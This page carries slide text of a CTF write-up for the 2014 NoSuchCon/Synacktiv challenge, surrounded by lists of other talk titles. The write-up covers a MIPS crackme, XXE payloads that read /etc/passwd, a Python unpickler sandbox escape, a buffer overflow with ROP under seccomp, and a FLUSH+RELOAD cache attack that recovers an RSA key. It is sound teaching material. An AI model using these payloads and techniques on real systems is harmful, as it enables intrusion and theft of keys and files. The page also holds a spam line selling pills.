NSC #2 - D1 01 - Rolf Rolles - Program synthesis in reverse engineeringNoSuchCon
 
NSC #2 - D3 05 - Alex Ionescu- Breaking Protected Processes
NSC #2 - D3 05 - Alex Ionescu- Breaking Protected ProcessesNSC #2 - D3 05 - Alex Ionescu- Breaking Protected Processes
NSC #2 - D3 05 - Alex Ionescu- Breaking Protected ProcessesNoSuchCon
 
NSC #2 - D2 05 - Andrea Barisani - Forging the USB Armory
NSC #2 - D2 05 - Andrea Barisani - Forging the USB ArmoryNSC #2 - D2 05 - Andrea Barisani - Forging the USB Armory
NSC #2 - D2 05 - Andrea Barisani - Forging the USB ArmoryNoSuchCon
 
NSC #2 - D3 03 - Jean-Philippe Aumasson - Cryptographic Backdooring
NSC #2 - D3 03 - Jean-Philippe Aumasson - Cryptographic BackdooringNSC #2 - D3 03 - Jean-Philippe Aumasson - Cryptographic Backdooring
NSC #2 - D3 03 - Jean-Philippe Aumasson - Cryptographic BackdooringNoSuchCon
 
NSC #2 - D2 04 - Ezequiel Gutesman - Blended Web and Database Attacks
NSC #2 - D2 04 - Ezequiel Gutesman - Blended Web and Database AttacksNSC #2 - D2 04 - Ezequiel Gutesman - Blended Web and Database Attacks
NSC #2 - D2 04 - Ezequiel Gutesman - Blended Web and Database AttacksNoSuchCon
 
NSC #2 - D2 03 - Nicolas Collignon - Google Apps Engine Security
NSC #2 - D2 03 - Nicolas Collignon - Google Apps Engine SecurityNSC #2 - D2 03 - Nicolas Collignon - Google Apps Engine Security
NSC #2 - D2 03 - Nicolas Collignon - Google Apps Engine SecurityNoSuchCon
 
NSC #2 - D1 05 - Renaud Lifchitz - Quantum computing in practice
NSC #2 - D1 05 - Renaud Lifchitz - Quantum computing in practiceNSC #2 - D1 05 - Renaud Lifchitz - Quantum computing in practice
NSC #2 - D1 05 - Renaud Lifchitz - Quantum computing in practiceNoSuchCon
 

Destaque (16)

NSC #2 - D2 02 - Benjamin Delpy - Mimikatz
NSC #2 - D2 02 - Benjamin Delpy - MimikatzNSC #2 - D2 02 - Benjamin Delpy - Mimikatz
NSC #2 - D2 02 - Benjamin Delpy - Mimikatz
 
NSC #2 - D2 06 - Richard Johnson - SAGEly Advice
NSC #2 - D2 06 - Richard Johnson - SAGEly AdviceNSC #2 - D2 06 - Richard Johnson - SAGEly Advice
NSC #2 - D2 06 - Richard Johnson - SAGEly Advice
 
NSC #2 - D3 02 - Peter Hlavaty - Attack on the Core
NSC #2 - D3 02 - Peter Hlavaty - Attack on the CoreNSC #2 - D3 02 - Peter Hlavaty - Attack on the Core
NSC #2 - D3 02 - Peter Hlavaty - Attack on the Core
 
NSC #2 - Challenge Introduction
NSC #2 - Challenge IntroductionNSC #2 - Challenge Introduction
NSC #2 - Challenge Introduction
 
NSC #2 - D2 01 - Andrea Allievi - Windows 8.1 Patch Protections
NSC #2 - D2 01 - Andrea Allievi - Windows 8.1 Patch ProtectionsNSC #2 - D2 01 - Andrea Allievi - Windows 8.1 Patch Protections
NSC #2 - D2 01 - Andrea Allievi - Windows 8.1 Patch Protections
 
NSC #2 - D1 03 - Sébastien Dudek - HomePlugAV PLC
NSC #2 - D1 03 - Sébastien Dudek - HomePlugAV PLCNSC #2 - D1 03 - Sébastien Dudek - HomePlugAV PLC
NSC #2 - D1 03 - Sébastien Dudek - HomePlugAV PLC
 
NSC #2 - D3 04 - Guillaume Valadon & Nicolas Vivet - Detecting BGP hijacks
NSC #2 - D3 04 - Guillaume Valadon & Nicolas Vivet - Detecting BGP hijacksNSC #2 - D3 04 - Guillaume Valadon & Nicolas Vivet - Detecting BGP hijacks
NSC #2 - D3 04 - Guillaume Valadon & Nicolas Vivet - Detecting BGP hijacks
 
NSC #2 - D1 02 - Georgi Geshev - Your Q is my Q
NSC #2 - D1 02 - Georgi Geshev - Your Q is my QNSC #2 - D1 02 - Georgi Geshev - Your Q is my Q
NSC #2 - D1 02 - Georgi Geshev - Your Q is my Q
 
NSC #2 - D3 01 - Thomas Braden - Exploitation of hardened MSP430-based device
NSC #2 - D3 01 - Thomas Braden - Exploitation of hardened MSP430-based deviceNSC #2 - D3 01 - Thomas Braden - Exploitation of hardened MSP430-based device
NSC #2 - D3 01 - Thomas Braden - Exploitation of hardened MSP430-based device
 
NSC #2 - D1 01 - Rolf Rolles - Program synthesis in reverse engineering
NSC #2 - D1 01 - Rolf Rolles - Program synthesis in reverse engineeringNSC #2 - D1 01 - Rolf Rolles - Program synthesis in reverse engineering
NSC #2 - D1 01 - Rolf Rolles - Program synthesis in reverse engineering
 
NSC #2 - D3 05 - Alex Ionescu- Breaking Protected Processes
NSC #2 - D3 05 - Alex Ionescu- Breaking Protected ProcessesNSC #2 - D3 05 - Alex Ionescu- Breaking Protected Processes
NSC #2 - D3 05 - Alex Ionescu- Breaking Protected Processes
 
NSC #2 - D2 05 - Andrea Barisani - Forging the USB Armory
NSC #2 - D2 05 - Andrea Barisani - Forging the USB ArmoryNSC #2 - D2 05 - Andrea Barisani - Forging the USB Armory
NSC #2 - D2 05 - Andrea Barisani - Forging the USB Armory
 
NSC #2 - D3 03 - Jean-Philippe Aumasson - Cryptographic Backdooring
NSC #2 - D3 03 - Jean-Philippe Aumasson - Cryptographic BackdooringNSC #2 - D3 03 - Jean-Philippe Aumasson - Cryptographic Backdooring
NSC #2 - D3 03 - Jean-Philippe Aumasson - Cryptographic Backdooring
 
NSC #2 - D2 04 - Ezequiel Gutesman - Blended Web and Database Attacks
NSC #2 - D2 04 - Ezequiel Gutesman - Blended Web and Database AttacksNSC #2 - D2 04 - Ezequiel Gutesman - Blended Web and Database Attacks
NSC #2 - D2 04 - Ezequiel Gutesman - Blended Web and Database Attacks
 
NSC #2 - D2 03 - Nicolas Collignon - Google Apps Engine Security
NSC #2 - D2 03 - Nicolas Collignon - Google Apps Engine SecurityNSC #2 - D2 03 - Nicolas Collignon - Google Apps Engine Security
NSC #2 - D2 03 - Nicolas Collignon - Google Apps Engine Security
 
NSC #2 - D1 05 - Renaud Lifchitz - Quantum computing in practice
NSC #2 - D1 05 - Renaud Lifchitz - Quantum computing in practiceNSC #2 - D1 05 - Renaud Lifchitz - Quantum computing in practice
NSC #2 - D1 05 - Renaud Lifchitz - Quantum computing in practice
 

Semelhante a NSC #2 - Challenge Solution

[CCC-28c3] Post Memory Corruption Memory Analysis
[CCC-28c3] Post Memory Corruption Memory Analysis[CCC-28c3] Post Memory Corruption Memory Analysis
[CCC-28c3] Post Memory Corruption Memory AnalysisMoabi.com
 
[Kiwicon 2011] Post Memory Corruption Memory Analysis
[Kiwicon 2011] Post Memory Corruption Memory Analysis[Kiwicon 2011] Post Memory Corruption Memory Analysis
[Kiwicon 2011] Post Memory Corruption Memory AnalysisMoabi.com
 
Linux kernel tracing superpowers in the cloud
Linux kernel tracing superpowers in the cloudLinux kernel tracing superpowers in the cloud
Linux kernel tracing superpowers in the cloudAndrea Righi
 
[HITB Malaysia 2011] Exploit Automation
[HITB Malaysia 2011] Exploit Automation[HITB Malaysia 2011] Exploit Automation
[HITB Malaysia 2011] Exploit AutomationMoabi.com
 
[Ruxcon 2011] Post Memory Corruption Memory Analysis
[Ruxcon 2011] Post Memory Corruption Memory Analysis[Ruxcon 2011] Post Memory Corruption Memory Analysis
[Ruxcon 2011] Post Memory Corruption Memory AnalysisMoabi.com
 
Auditing the Opensource Kernels
Auditing the Opensource KernelsAuditing the Opensource Kernels
Auditing the Opensource KernelsSilvio Cesare
 
Shall we play a game
Shall we play a gameShall we play a game
Shall we play a gamejackpot201
 
Docker and-containers-for-development-and-deployment-scale12x
Docker and-containers-for-development-and-deployment-scale12xDocker and-containers-for-development-and-deployment-scale12x
Docker and-containers-for-development-and-deployment-scale12xrkr10
 
Jörg Schad - NO ONE PUTS Java IN THE CONTAINER - Codemotion Milan 2017
Jörg Schad - NO ONE PUTS Java IN THE CONTAINER - Codemotion Milan 2017Jörg Schad - NO ONE PUTS Java IN THE CONTAINER - Codemotion Milan 2017
Jörg Schad - NO ONE PUTS Java IN THE CONTAINER - Codemotion Milan 2017Codemotion
 
Kettunen, miaubiz fuzzing at scale and in style
Kettunen, miaubiz fuzzing at scale and in styleKettunen, miaubiz fuzzing at scale and in style
Kettunen, miaubiz fuzzing at scale and in styleDefconRussia
 
We shall play a game....
We shall play a game....We shall play a game....
We shall play a game....Sadia Textile
 
Shall we play a game?
Shall we play a game?Shall we play a game?
Shall we play a game?Maciej Lasyk
 
Talk 160920 @ Cat System Workshop
Talk 160920 @ Cat System WorkshopTalk 160920 @ Cat System Workshop
Talk 160920 @ Cat System WorkshopQuey-Liang Kao
 
Varnish http accelerator
Varnish http acceleratorVarnish http accelerator
Varnish http acceleratorno no
 
44 con slides
44 con slides44 con slides
44 con slidesgeeksec80
 

Semelhante a NSC #2 - Challenge Solution (20)

[CCC-28c3] Post Memory Corruption Memory Analysis
[CCC-28c3] Post Memory Corruption Memory Analysis[CCC-28c3] Post Memory Corruption Memory Analysis
[CCC-28c3] Post Memory Corruption Memory Analysis
 
[Kiwicon 2011] Post Memory Corruption Memory Analysis
[Kiwicon 2011] Post Memory Corruption Memory Analysis[Kiwicon 2011] Post Memory Corruption Memory Analysis
[Kiwicon 2011] Post Memory Corruption Memory Analysis
 
Linux kernel tracing superpowers in the cloud
Linux kernel tracing superpowers in the cloudLinux kernel tracing superpowers in the cloud
Linux kernel tracing superpowers in the cloud
 
[HITB Malaysia 2011] Exploit Automation
[HITB Malaysia 2011] Exploit Automation[HITB Malaysia 2011] Exploit Automation
[HITB Malaysia 2011] Exploit Automation
 
[Ruxcon 2011] Post Memory Corruption Memory Analysis
[Ruxcon 2011] Post Memory Corruption Memory Analysis[Ruxcon 2011] Post Memory Corruption Memory Analysis
[Ruxcon 2011] Post Memory Corruption Memory Analysis
 
Auditing the Opensource Kernels
Auditing the Opensource KernelsAuditing the Opensource Kernels
Auditing the Opensource Kernels
 
Programar para GPUs
Programar para GPUsProgramar para GPUs
Programar para GPUs
 
0507 057 01 98 * Adana Klima Servisleri
0507 057 01 98 * Adana Klima Servisleri0507 057 01 98 * Adana Klima Servisleri
0507 057 01 98 * Adana Klima Servisleri
 
Shall we play a game
Shall we play a gameShall we play a game
Shall we play a game
 
Shall we play a game?
Shall we play a game?Shall we play a game?
Shall we play a game?
 
Cryptography Attacks and Applications
Cryptography Attacks and ApplicationsCryptography Attacks and Applications
Cryptography Attacks and Applications
 
Lrz kurs: big data analysis
Lrz kurs: big data analysisLrz kurs: big data analysis
Lrz kurs: big data analysis
 
Docker and-containers-for-development-and-deployment-scale12x
Docker and-containers-for-development-and-deployment-scale12xDocker and-containers-for-development-and-deployment-scale12x
Docker and-containers-for-development-and-deployment-scale12x
 
Jörg Schad - NO ONE PUTS Java IN THE CONTAINER - Codemotion Milan 2017
Jörg Schad - NO ONE PUTS Java IN THE CONTAINER - Codemotion Milan 2017Jörg Schad - NO ONE PUTS Java IN THE CONTAINER - Codemotion Milan 2017
Jörg Schad - NO ONE PUTS Java IN THE CONTAINER - Codemotion Milan 2017
 
Kettunen, miaubiz fuzzing at scale and in style
Kettunen, miaubiz fuzzing at scale and in styleKettunen, miaubiz fuzzing at scale and in style
Kettunen, miaubiz fuzzing at scale and in style
 
We shall play a game....
We shall play a game....We shall play a game....
We shall play a game....
 
Shall we play a game?
Shall we play a game?Shall we play a game?
Shall we play a game?
 
Talk 160920 @ Cat System Workshop
Talk 160920 @ Cat System WorkshopTalk 160920 @ Cat System Workshop
Talk 160920 @ Cat System Workshop
 
Varnish http accelerator
Varnish http acceleratorVarnish http accelerator
Varnish http accelerator
 
44 con slides
44 con slides44 con slides
44 con slides
 

Último

How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MIND CTI
 
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...Principled Technologies
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoffsammart93
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CVKhem
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024The Digital Insurer
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...apidays
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc
 
HTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesHTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesBoston Institute of Analytics
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMESafe Software
 
Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024The Digital Insurer
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherRemote DBA Services
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 

Último (20)

How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
 
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
HTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesHTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation Strategies
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 

NSC #2 - Challenge Solution

  • 1. NSC#2 / Synacktiv challenge
  • 2. Who am I ● Fabien Perigaud (@0xf4b) ● Reverse engineer at Airbus Defence and Space ● Challenges addict :)
  • 3. NSC#2 challenge ● 3 parts – MIPS crackme – Web / Python exploitation – X64 / Crypto exploitation
  • 4. MIPS crackme $ file crackmips crackmips: ELF 32-bit LSB executable, MIPS, MIPS-II version 1, dynamically linked (uses shared libs), for GNU/Linux 2.6.26, BuildID[sha1]=be26414a4b6e7af7098c07a6646a5c658e1440e7, not stripped ● Runs in Qemu ● MIPS Debian images available (Aurel32) root@debian-mipsel:~# ./crackmips usage: ./crackmips password root@debian-mipsel:~# ./crackmips test WRONG PASSWORD
  • 5. In IDA ● Ugly big block ● Quite simple global behaviour
  • 7. Parent: debug() ● Waits for a child break ● Get $pc value (ptrace(...)) ● Big block (again!) to compute new $pc ● Replace $pc in child's context => Operations on $pc independent from the password
  • 8. Parent: debug() (2) ● Simple GDB script can recover all modified $pc values b *0x400B90 commands p/x $v0 cont end b *0x401D88 commands p/x $v0 cont end
  • 9. Child: big ugly block ● Operates on DWORD of the password (loop on 6 DWORD) ● Can be divided in ~100 small blocks – Separated by “break 0” instructions ● Each small block is a simple operation – Only ~10 different ones (NOT/ADD/SUB/ROR/ROL/XOR with immediate values or a counter) – Pattern matching on instructions to transform big block in a set of basic operations
  • 10. Big block transformation $ python transform.py extract_ida.txt [...] .text:00402290: SUB CNT .text:004022C0: ROR 1 .text:0040230C: SUB CNT .text:0040233C: XOR 0x7B4DE789 .text:00402370: ADD 0x87DD2BC5 .text:004023A4: ROR 12 .text:004023F0: ADD CNT .text:00402420: XOR CNT .text:00402450: ROL 13 .text:0040249C: NOT [...]
  • 11. Putting all together ● New execution path + basic operations on password ● We can now invert the algorithm from the string "[ Synacktiv + NSC = <3 ]"
  • 12. Part1 done $ python resolve_part1.py 322644EF941077AB1115AB575363AE87F58E6D9AFE5C62CC # ./crackmips 322644EF941077AB1115AB575363AE87F58E6D9AFE5C62CC good job! Next level is there: http://nsc2014.synacktiv.com:65480/oob4giekee4zaeW9/
  • 14. Web exploitation (2) ● Try to post a message POST /msg.add HTTP/1.1 Host: nsc2014.synacktiv.com:65480 [...] vs=&title=TITLE_TEST&body=<msg>MSG_TEST</msg> => Smells like XML ! XXE anyone ?
  • 15. XXE ! ● Let's try … POST /msg.add HTTP/1.1 Host: nsc2014.synacktiv.com:65480 [...] vs=&title=TITLE_TEST&body=<!DOCTYPE foo [<!ENTITY z SYSTEM "file:///etc/passwd">]><msg>&z;</msg>
  • 16. XXE ! (2) ● Dir listing ? POST /msg.add HTTP/1.1 Host: nsc2014.synacktiv.com:65480 [...] vs=&title=TITLE_TEST&body=<!DOCTYPE foo [<!ENTITY z SYSTEM "file:///">]><msg>&z;</msg>
  • 17. XXE ! (3) ● Just retrieve the two files $ cat app.conf [global] you_know_how_to_play_with_xxe = 1 admin_url = /secret.key [viewstate] key = ab2f8913c6fde13596c09743a802ff7a $ file viewstate.pyc viewstate.pyc: python 2.7 byte-compiled
  • 18. /secret.key ? ● viewstate.pyc → uncompyle2 → viewstate.py ● Code responsible for the /secret.key request ADMIN_HOSTS = frozenset(['127.0.0.1', '::1', '10.0.1.200']) @staticmethod def getMasterSecretKey(req, vs_data = None): assert isinstance(req, EZWebRequest) vs = App._load_session(vs_data) if vs.data.get('uid', -1) != 31337: raise SecurityError('not allowed from this uid') if req.env['REMOTE_ADDR'] not in App.ADMIN_HOSTS: raise SecurityError('not allowed from this IP address') return (vs, SecretStore.getMasterKey())
  • 19. vs ● Serialized dictionary → compressed (zlib) → ciphered (AES) → encoded (base64) ● Key provided by app.conf ● Unserialization done by a custom Unpickler (restricted __reduce__() functions list) SAFE_BUILTINS = frozenset(['bool', 'chr', 'dict', 'float', 'getattr', 'int', 'list', 'locals', 'long', 'max', 'min', 'repr', 'set', 'setattr', 'str', 'sum', 'tuple', 'type', 'unicode'])
  • 20. Python exploitation ● Goal: add eval to the SAFE_BUILTINS set ● Steps: – Create new set → we've access to set() – Retrieve “self” → next slide :) – setattr(self, “SAFE_BUILTINS”, new_set) → we've access to setattr() – PROFIT §§§ → next next slide
  • 21. Python exploitation (2) ● locals() returns a dict containing “self” ● getattr() does not allow to retrieve a dict element ● type(“x”, (), mydict) allows to create a new object with mydict as __dict__ ● “self” retrieved with : getattr(type("obj42", (), locals()), "self")
  • 22. Python exploitation (3) ● Secret key should be in the getMasterKey() function constants eval(__import__('viewstate').SecretStore.getMas terKey.func_code.co_consts) ● Final vs vs = {'msg': [{'body': SETATTR(), 'title': EVAL()}], 'display_name': 'guest'}
  • 23. Part2 done … "messages": [{"body": null, "title": [null, 124, "getMasterKey() caller not authorized (opcode %i/%i)", "viewstate.py", "getMasterKey() caller not authorized", "getMasterSecretKey", "getMasterKey() caller not authorized (function %s/%s)", "master_key=http://nsc2014.synacktiv.com:65480/OhXieK1hEiza hk2i/securedrop.tar.gz"]} ...
  • 24. SecureDrop $ tar tvzf securedrop.tar.gz ● drwxr-xr-x efiliol/ANSSI 0 2014-09-01 17:06 securedrop/ ● drwxr-xr-x efiliol/ANSSI 0 2014-09-01 17:06 securedrop/client/ ● -rw-r--r-- efiliol/ANSSI 2002 2014-08-28 12:23 securedrop/client/client.py ● drwxr-xr-x efiliol/ANSSI 0 2014-09-01 17:06 securedrop/archive/ ● -rw-r--r-- efiliol/ANSSI 803 2014-09-01 17:06 securedrop/archive/messages ● drwxr-xr-x efiliol/ANSSI 0 2014-08-27 19:06 securedrop/servers/ ● -rwxr-xr-x efiliol/ANSSI 9600 2014-08-27 18:43 securedrop/servers/SecDrop ● drwxr-xr-x efiliol/ANSSI 0 2014-08-27 14:34 securedrop/servers/xinetd.conf/ ● -rw-r--r-- efiliol/ANSSI 466 2014-08-27 14:34 securedrop/servers/xinetd.conf/secdrop ● -rw-r--r-- efiliol/ANSSI 449 2014-08-27 14:34 securedrop/servers/xinetd.conf/stpm ● -rwxr-xr-x efiliol/ANSSI 14728 2014-08-27 18:43 securedrop/servers/STPM ● drwxr-xr-x efiliol/ANSSI 0 2014-08-27 14:35 securedrop/lib/ ● -rwxr-xr-x efiliol/ANSSI 35648 2014-08-27 18:43 securedrop/lib/libsec.so
  • 25. Global architecture client.py SecDrop STPM Client side Server side
  • 26. Client.py ● Asks a message ● Generates random AES key ● Ciphers message (AES) ● Ciphers AES key (RSA) ● Send ciphered message + ciphered key (+ a constant password to authenticate with the service): separation with a 'n'
  • 27. SecDrop ● Handles client.py connections / requests ● Asks STPM to decrypt the message ● If decryption is correct, save the ciphered message/key to “messages” file
  • 28. STPM ● Stores secret keys (AES / RSA) – Can import new keys ● Handles 4 commands : – import_key – export_key – print_keys – message_decrypt
  • 29. libsec.so ● Loaded by both SecDrop and STPM ● Various cryptographic functions : – AES-OCB3 (encrypt/decrypt messages): SEC_crypt(), SEC_decrypt() – RSA (import/export AES key): key_wrap(), key_unwrap() ● Printing functions: SEC_fprintf(), SEC_fprintf_keys(), SEC_fgetc()
  • 30. And now ? ● Goal is to decrypt “messages” file ● Need to get RSA private key OR decrypted AES key ● Let's have a look at SecDrop
  • 31. SecDrop Vulnerability ● Trivial stack buffer overflow in client messages handling ● Seccomp with custom rules (only access to read(), write() and exit()) ● No NX on this binary (took me a few days …) ● Performed some ROP to put an arbitrary shellcode in a known location and jmp on it – Didn't see the “jmp rsp” in the code … ● Now what ?
  • 32. Now what ? client.py SecDrop STPM Client side Server side We're here
  • 33. Now what ? ● Try to call the list_keys() function in STPM ● Returns: – AES key: k = SECRET :) – RSA key: q = PRIVATE :) ● Function only allows printing public part of the RSA key :( 21:17 <Baboon> :D 21:17 <Baboon> tu croyais quoi 21:18 <Baboon> tu vas en chier :P
  • 34. Now hints ! ● Spent some days trying to find a “classical” vulnerability in STPM… ● Hints published by Synacktiv
  • 35. Hints decoding ● “RDTSC”: timing attack ● “Attack the cache”: timing attack on the CPU cache ● Looking for papers … – “FLUSH+RELOAD: a High Resolution, Low Noise, L3 Cache Side-Channel Attack” → attack on CPU cache to retrieve a RSA key when a naive implementation is used
  • 36. Attack! ● Determine the execution path taken by the process ● We'll attack the square and multiply accum = 1; i = 0; bpow2 = m while ((d>>i)>0): if((d>>i) & 1): accum = (accum*bpow2) % n # multiply bpow2 = (bpow2*bpow2) % n # square i+=1 return accum This part is taken if the current bit is 1
  • 37. Processor cache ● CPU wants to execute code at address X – Check if data is in cache – If not, load it from memory then cache it ● Is data in cache? – Just measure the time taken to access it! ● From another process?? – Yes! Shared pages FTW
  • 38. Shared pages SecDrop STPM Physical memory libsec.so - Both processes access the same memory page - If STPM executes address X, the data is put in cache - If SecDrop then accesses address X, it will be retrieved from the cache
  • 39. Attack! (2) ● How to know if code at @X has been executed by STPM ? – Measure time to access @X form SecDrop ● Slow → not in cache → not executed ● Fast → in cache → has been executed ! – Flush the cache! – Sleep ; goto start ; ● Allows to know when a specific part of the code has been executed across time – Reveals bits of the key!
